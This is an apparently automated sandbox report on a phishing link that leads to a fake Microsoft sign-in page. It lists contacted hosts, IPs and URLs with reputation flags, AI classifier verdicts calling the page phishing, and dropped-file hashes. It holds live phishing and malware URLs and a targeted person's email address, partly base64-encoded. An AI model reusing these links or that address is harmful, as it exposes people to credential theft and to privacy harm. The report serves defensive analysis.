          https://play.google.com/log?format=json&hasfast=true0%Avira URL Cloudsafe
          https://rfwai.elixir85.com/pqC74CTJePSu4Ivyz37z7VePwx370%Avira URL Cloudsafe
          https://ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev/?utm_source=nohsins-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-post0%Avira URL Cloudsafe
          https://ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev/favicon.ico0%Avira URL Cloudsafe
          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=89d927bb0859422d0%Avira URL Cloudsafe
          https://rfwai.elixir85.com/kliHDnAE0gTkmBMJlvBgKdx2UgHYVMjMpYKl2bzij6kYptmsP7Qz5ArvdibzdrlKBVuv2200%Avira URL Cloudsafe
          https://cdn.socket.io/4.6.0/socket.io.min.js0%Avira URL Cloudsafe
          https://rfwai.elixir85.com/rs3DhQgZj5jQkQBct28ombhTCAHmieGU0ouxgh9zt47ITiP0AvmihR1tBef2000%Avira URL Cloudsafe
          https://a.nel.cloudflare.com/report/v4?s=xHDPp4JIf6W5%2BDk0JsMWxwf7EwYmvp%2FYfbOr7%2ForBSz4LD77PlTvEMshqmRD6ohVVxxfRe8HG5jHbgbHKm%2Binhk4xnpT%2B8ekopSjxsuZl%2F4g0quhwFoJyeMwEn9OQg%3D%3D0%Avira URL Cloudsafe
          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1016911571:1720031246:aWlWO2XSgzbXSgRbyl1CFEiTI1VOUKePXlJl5xr3Kxo/89d927bb0859422d/9126e412fd5a54e0%Avira URL Cloudsafe
          https://a.nel.cloudflare.com/report/v4?s=fJLqGBSa3FkswmLN9bCexSRo%2FOCeeyUYPrtX20YljbJIejETBET5PKRKjJ17QWr%2BwEH2zHT3SgVm%2F%2F6z%2FYA3HJoaL8b6Hd59RRiuB%2BB1aNQl5EAEER7Y%2FPKe1F%2Bgdw%3D%3D0%Avira URL Cloudsafe
          https://rfwai.elixir85.com/ijBHzsqcIkRtTjbxMugPeR81zw0x5yUVlfNjXopYiBinvvsl7gMzOUKramHNI6Cfhnab2280%Avira URL Cloudsafe
          https://zichd.6gniu68.ru/dbXLDQtpDSRBuBhVOTWKwXxoBYwUSJTUEAPHETTNOFYTDAHVOKJURMWUFLQPVMBESXVOSRVBAFBDN100%Avira URL Cloudmalware
          NameIPActiveMaliciousAntivirus DetectionReputation
          rfwai.elixir85.com
          104.21.89.143
          truetrue
            unknown
            a.nel.cloudflare.com
            35.190.80.1
            truefalse
              unknown
              github.com
              140.82.121.3
              truefalse
                unknown
                zichd.6gniu68.ru
                188.114.97.3
                truefalse
                  unknown
                  ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev
                  172.66.45.7
                  truefalse
                    unknown
                    ipapi.co
                    172.67.69.226
                    truefalse
                      unknown
                      ysh.logentr.com
                      188.114.97.3
                      truefalse
                        unknown
                        code.jquery.com
                        151.101.194.137
                        truefalse
                          unknown
                          d2vgu95hoyrpkh.cloudfront.net
                          18.245.31.33
                          truefalse
                            unknown
                            cdnjs.cloudflare.com
                            104.17.24.14
                            truefalse
                              unknown
                              link.mail.beehiiv.com
                              104.18.69.40
                              truefalse
                                unknown
                                challenges.cloudflare.com
                                104.17.2.184
                                truefalse
                                  unknown
                                  www.google.com
                                  142.250.185.196
                                  truefalse
                                    unknown
                                    d19d360lklgih4.cloudfront.net
                                    108.156.39.60
                                    truefalse
                                      unknown
                                      objects.githubusercontent.com
                                      185.199.109.133
                                      truefalse
                                        unknown
                                        httpbin.org
                                        18.214.17.35
                                        truefalse
                                          unknown
                                          cdn.socket.io
                                          unknown
                                          unknownfalse
                                            unknown
                                            ok4static.oktacdn.com
                                            unknown
                                            unknownfalse
                                              unknown
                                              NameMaliciousAntivirus DetectionReputation
                                              https://rfwai.elixir85.com/ophQfOAKqa13061H23eI96MwQ1iF0kZmnaRI3dvE34mhKSmU3i9C67140true
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://rfwai.elixir85.com/45JQQXGinJG902EgrDtnvQTvw65true
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://rfwai.elixir85.com/uvxQtGj3CZl2NHEVqVIl3gDjBSop26aE86MZBefBLzm512128true
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://rfwai.elixir85.com/yzRdfjjshRC3IrYk8A7PQOd9IO3rsWR2oi1eXvnzkPxuZab180true
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://rfwai.elixir85.com/uvrkTtrGLzA9nOtO0uRNX2ukFXM6ttnWjIo6De4Rue8U5rkmnqqgYjP3dvGgTUnVi3jY1Cegh254true
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://rfwai.elixir85.com/12uyZYHBH78nzrKfwqr47true
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://rfwai.elixir85.com/yoCRQfrZ0iVvPSQxT7vvEGN44mzSHgJf035E0VZBImhSjltrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://rfwai.elixir85.com/favicon.icotrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://ysh.logentr.com/nifpyfuwrptybwamhqjifvdpkdSUBupTOFEKFMKMMHWTBNFLLVDHGJXSUFNYTXJFVQHZQpqTKFJlwZCJgDwI7yzBldhljwwx40false
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://rfwai.elixir85.com/RfWAi/true
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwtrue
                                                unknown
                                                https://rfwai.elixir85.com/op8n0GHVANMlpH3sUTok8VHPTN8s9ObpAxHGstCocx0HifJbSyvtSDKzk5ywfdcd232true
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://rfwai.elixir85.com/ijW6ax7zUB7JKxnxsqoYba3bEJXUHkaugjRSkLLb83klpSwyDyWXfGqe6G7wTrPhUrnsIYwrzp12209true
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.cssfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://rfwai.elixir85.com/mnn8U5yVMoEYzlOfgNnAivXZ1CIQzlLocVuvEshLSY4IQMWWAxbx90145true
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://rfwai.elixir85.com/12C1tM2Y6lGcdYEVUZu6720true
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.google.com/recaptcha/api.jsfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://rfwai.elixir85.com/veVvvrbtHetJlBWJqFj8ZEAe7Nkuts2OfI7xSK2rwtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3Dfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://ipapi.co/8.46.123.33/json/false
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://rfwai.elixir85.com/90jodEH2Rir67QW4OuPst51true
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev/?utm_source=nohsins-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-post#?email=YWx5c2EuYUBjZW50dXJ5Yml6c29sdXRpb25zLmNvbQ==false
                                                  unknown
                                                  https://rfwai.elixir85.com/345f8FXSJyBv6seEmEdklOXxG5e6FIs89107true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://rfwai.elixir85.com/ijg96tfwHavl6dODlGNgwxFtzlAssOTwlMZqK1Qg56170true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://rfwai.elixir85.com/89U0IUXkEak2DXQHKMqxZiF121VeznpNcbYfab72true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://rfwai.elixir85.com/efO4CTDXl0E5HViNkg78iFXDw85H8kkQKZmn98true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://rfwai.elixir85.com/abjlZHFJHKoUOtpqyef30true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uf0no/0x4AAAAAAAdNpXskQfUxzmND/auto/normaltrue
                                                    unknown
                                                    https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.cssfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://rfwai.elixir85.com/RfWAi/#Xalysa.a@centurybizsolutions.comtrue
                                                      unknown
                                                      https://challenges.cloudflare.com/turnstile/v0/g/d2a97f6b6ec9/api.jsfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://rfwai.elixir85.com/RfWAi/?vXalysa.a@centurybizsolutions.comtrue
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://httpbin.org/ipfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/89d927bb0859422d/1720033614003/48Eq3BNYqb_JyY1false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev/?utm_source=nohsins-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-postfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://rfwai.elixir85.com/pqC74CTJePSu4Ivyz37z7VePwx37true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev/favicon.icofalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=89d927bb0859422dfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://cdn.socket.io/4.6.0/socket.io.min.jsfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://rfwai.elixir85.com/kliHDnAE0gTkmBMJlvBgKdx2UgHYVMjMpYKl2bzij6kYptmsP7Qz5ArvdibzdrlKBVuv220true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://rfwai.elixir85.com/rs3DhQgZj5jQkQBct28ombhTCAHmieGU0ouxgh9zt47ITiP0AvmihR1tBef200true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw#true
                                                        unknown
                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1016911571:1720031246:aWlWO2XSgzbXSgRbyl1CFEiTI1VOUKePXlJl5xr3Kxo/89d927bb0859422d/9126e412fd5a54efalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://a.nel.cloudflare.com/report/v4?s=xHDPp4JIf6W5%2BDk0JsMWxwf7EwYmvp%2FYfbOr7%2ForBSz4LD77PlTvEMshqmRD6ohVVxxfRe8HG5jHbgbHKm%2Binhk4xnpT%2B8ekopSjxsuZl%2F4g0quhwFoJyeMwEn9OQg%3D%3Dfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://rfwai.elixir85.com/ijBHzsqcIkRtTjbxMugPeR81zw0x5yUVlfNjXopYiBinvvsl7gMzOUKramHNI6Cfhnab228true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://a.nel.cloudflare.com/report/v4?s=fJLqGBSa3FkswmLN9bCexSRo%2FOCeeyUYPrtX20YljbJIejETBET5PKRKjJ17QWr%2BwEH2zHT3SgVm%2F%2F6z%2FYA3HJoaL8b6Hd59RRiuB%2BB1aNQl5EAEER7Y%2FPKe1F%2Bgdw%3D%3Dfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://zichd.6gniu68.ru/dbXLDQtpDSRBuBhVOTWKwXxoBYwUSJTUEAPHETTNOFYTDAHVOKJURMWUFLQPVMBESXVOSRVBAFBDNfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://developers.google.com/recaptcha/docs/faq#localhost_supportchromecache_87.3.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://support.google.com/recaptcha#6262736chromecache_87.3.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://support.google.com/recaptcha/?hl=en#6223828chromecache_87.3.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://cloud.google.com/contactchromecache_87.3.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://github.com/fent)chromecache_114.3.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://support.google.com/recaptcha/#6175971chromecache_87.3.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.gstatic.c..?/recaptcha/releases/rKbTvxTxwcw5VqzrtN-ICwWt/recaptcha__.chromecache_87.3.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.google.com/recaptcha/api2/chromecache_112.3.dr, chromecache_87.3.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://support.google.com/recaptchachromecache_87.3.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://RfWAi.elixir85.com/RfWAi/#Xchromecache_128.3.dr, chromecache_102.3.dr, chromecache_118.3.drfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://cloud.google.com/recaptcha-enterprise/billing-informationchromecache_87.3.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://recaptcha.netchromecache_87.3.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.apache.org/licenses/chromecache_87.3.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-quechromecache_87.3.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://play.google.com/log?format=json&hasfast=truechromecache_87.3.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-recachromecache_87.3.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        65.9.86.83
                                                        unknownUnited States
                                                        16509AMAZON-02USfalse
                                                        18.214.17.35
                                                        httpbin.orgUnited States
                                                        14618AMAZON-AESUSfalse
                                                        18.245.31.33
                                                        d2vgu95hoyrpkh.cloudfront.netUnited States
                                                        16509AMAZON-02USfalse
                                                        104.17.3.184
                                                        unknownUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        185.199.109.133
                                                        objects.githubusercontent.comNetherlands
                                                        54113FASTLYUSfalse
                                                        35.190.80.1
                                                        a.nel.cloudflare.comUnited States
                                                        15169GOOGLEUSfalse
                                                        151.101.194.137
                                                        code.jquery.comUnited States
                                                        54113FASTLYUSfalse
                                                        172.67.69.226
                                                        ipapi.coUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        104.17.24.14
                                                        cdnjs.cloudflare.comUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        140.82.121.3
                                                        github.comUnited States
                                                        36459GITHUBUSfalse
                                                        172.66.45.7
                                                        ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.devUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        104.21.89.143
                                                        rfwai.elixir85.comUnited States
                                                        13335CLOUDFLARENETUStrue
                                                        3.227.135.8
                                                        unknownUnited States
                                                        14618AMAZON-AESUSfalse
                                                        239.255.255.250
                                                        unknownReserved
                                                        unknownunknownfalse
                                                        142.250.185.196
                                                        www.google.comUnited States
                                                        15169GOOGLEUSfalse
                                                        188.114.97.3
                                                        zichd.6gniu68.ruEuropean Union
                                                        13335CLOUDFLARENETUSfalse
                                                        142.250.186.164
                                                        unknownUnited States
                                                        15169GOOGLEUSfalse
                                                        104.18.69.40
                                                        link.mail.beehiiv.comUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        104.17.2.184
                                                        challenges.cloudflare.comUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        108.156.39.60
                                                        d19d360lklgih4.cloudfront.netUnited States
                                                        16509AMAZON-02USfalse
                                                        IP
                                                        192.168.2.5
                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                        Analysis ID:1467205
                                                        Start date and time:2024-07-03 21:05:29 +02:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 3m 34s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:browseurl.jbs
                                                        Sample URL:https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=YWx5c2EuYUBjZW50dXJ5Yml6c29sdXRpb25zLmNvbQ==
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:8
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal80.phis.win@20/105@54/21
                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 216.58.206.35, 142.250.181.238, 74.125.71.84, 192.229.221.95, 34.104.35.123, 2.19.126.163, 40.127.169.103, 13.95.31.18, 13.85.23.86, 20.166.126.56, 142.250.184.195, 142.250.186.42, 172.217.16.202, 142.250.186.138, 142.250.185.74, 142.250.184.202, 216.58.206.74, 172.217.18.10, 172.217.16.138, 142.250.74.202, 142.250.184.234, 142.250.186.170, 142.250.185.202, 142.250.186.106, 142.250.181.234, 142.250.185.234, 216.58.206.42, 216.58.212.131, 173.222.108.226, 142.250.185.174
                                                        • Excluded domains from analysis (whitelisted): clients1.google.com, client.wns.windows.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, www.gstatic.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • VT rate limit hit for: https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=YWx5c2EuYUBjZW50dXJ5Yml6c29sdXRpb25zLmNvbQ==
                                                        No simulations
                                                        InputOutput
                                                        URL: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw Model: Perplexity: mixtral-8x7b-instruct
                                                        {"loginform": true,"urgency": false,"captcha": false,"reasons": ["The webpage contains a login form which explicitly requests sensitive information such as email addresses and passwords.","The text does not create a sense of urgency or interest.","The webpage does not contain a CAPTCHA or any other anti-robot detection mechanism."]}
                                                        Title: Financial Modeling OCR:  Microsoft Sign in alysa.s@centurybizsclutions.com eccaunt7 Creete cre Cent eccess your account? Sign-in options Terms of use Privacy & cookies 
                                                        URL: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw Model: Perplexity: mixtral-8x7b-instruct
                                                        {"loginform": true,"urgency": false,"captcha": false,"reasons": ["The webpage contains a login form which explicitly requests sensitive information such as email addresses and passwords.","There is no sense of urgency created in the text.","There is no CAPTCHA or anti-robot detection mechanism present on the webpage."]}
                                                        Title: Financial Modeling OCR:  Microsoft Sign in alysa.s@centurybizsclutions.cam No ecccunt7 Create one: Can't access your account? Next Sign-in options Terms of use Privacy & cookies 
                                                        URL: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw Model: Perplexity: mixtral-8x7b-instruct
                                                        {"loginform": true,"urgency": false,"captcha": false,"reasons": ["The webpage contains a login form which explicitly requests sensitive information such as email addresses and passwords.","The text does not create a sense of urgency or interest.","There is no CAPTCHA or anti-robot detection mechanism present on the webpage."]}
                                                        Title: Financial Modeling OCR: Microsoft Sign in We couldn't find an account with that username. Try another, or get a new Microsoft account alysa.a@centurybizsolutions.com No account? Create one! Can't access your account? Next Sign-in options Terms of use Privacy & cookies 
                                                        URL: https://rfwai.elixir85.com Model: gpt-4o
                                                        ```json{  "phishing_score": 9,  "brands": "Microsoft",  "phishing": true,  "suspicious_domain": true,  "has_prominent_loginform": true,  "has_captcha": false,  "setechniques": true,  "has_suspicious_link": true,  "legitmate_domain": "microsoft.com",  "reasons": "The URL 'https://rfwai.elixir85.com' does not match the legitimate domain name 'microsoft.com' associated with the brand Microsoft. The presence of a prominent login form on a non-legitimate domain is a common phishing technique. Additionally, the URL structure and the use of a subdomain (rfwai.elixir85.com) are suspicious and often used in phishing attacks to mislead users. The image resembles a legitimate Microsoft login page, which is a social engineering technique to gain user trust. There is no CAPTCHA present, which is often a feature in legitimate login pages to prevent automated attacks. The link 'Create one!' and 'Can't access your account?' are suspicious as they may lead to further phishing attempts."}
                                                        URL: https://rfwai.elixir85.com Model: gpt-4o
                                                        ```json{  "phishing_score": 9,  "brands": "Microsoft",  "phishing": true,  "suspicious_domain": true,  "has_prominent_loginform": true,  "has_captcha": false,  "setechniques": true,  "has_suspicious_link": true,  "legitmate_domain": "microsoft.com",  "reasons": "The URL 'https://rfwai.elixir85.com' does not match the legitimate domain 'microsoft.com' associated with the brand Microsoft. The presence of a prominent login form on a non-legitimate domain is a common phishing technique. Additionally, the domain 'elixir85.com' is suspicious and not associated with Microsoft. The use of social engineering techniques is evident as the page mimics the legitimate Microsoft login page to deceive users into entering their credentials. There is no CAPTCHA present, which is often used in legitimate sites to prevent automated attacks. The combination of these factors strongly indicates that this is a phishing site."}
                                                        URL: https://rfwai.elixir85.com Model: gpt-4o
                                                        ```json{  "phishing_score": 9,  "brands": "Microsoft",  "phishing": true,  "suspicious_domain": true,  "has_prominent_loginform": true,  "has_captcha": false,  "setechniques": true,  "has_suspicious_link": true,  "legitmate_domain": "microsoft.com",  "reasons": "The URL 'https://rfwai.elixir85.com' does not match the legitimate domain for Microsoft, which is 'microsoft.com'. The presence of a prominent login form on a suspicious domain is a common phishing technique. Additionally, the URL uses a subdomain that does not relate to Microsoft, which is another red flag. The site attempts to mimic the Microsoft login page, which is a social engineering technique to mislead users into entering their credentials. The presence of suspicious links such as 'No account? Create one!' and 'Can't access your account?' further indicates phishing attempts."}
                                                        No context
                                                        No context
                                                        No context
                                                        No context
                                                        No context
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jul 3 18:06:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                        Category:dropped
                                                        Size (bytes):2677
                                                        Entropy (8bit):3.9817044622015207
                                                        Encrypted:false
                                                        SSDEEP:48:8HudsTQEA+HvidAKZdA19ehwiZUklqehOy+3:8HVvTBy
                                                        MD5:DEE3AED367BC3186F0D019A6617802D2
                                                        SHA1:C22399D877B0235AB04D8E6E52228445281178A9
                                                        SHA-256:37F19B00B87DE273EF6648460355C48F9125E8867DEBCAA6C99A2733BA5817E9
                                                        SHA-512:852A812977BF6A44EA84B18D1D8BA02194E83104770C60D6F31100FF065D46E1E17E1F7EE89F68D4095E44630F1A5E2DAF341F17FF03A0B941F54FBE44C1FD6A
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:L..................F.@.. ...$+.,....o. |...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jul 3 18:06:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                        Category:dropped
                                                        Size (bytes):2679
                                                        Entropy (8bit):3.9978533175629973
                                                        Encrypted:false
                                                        SSDEEP:48:8odsTQEA+HvidAKZdA1weh/iZUkAQkqehxy+2:8vvh9Qgy
                                                        MD5:2E6871040D9CAB7DCF31DB17A362EEDA
                                                        SHA1:83A2CAA9A90A8C57933F21381CA2ACA8224C9000
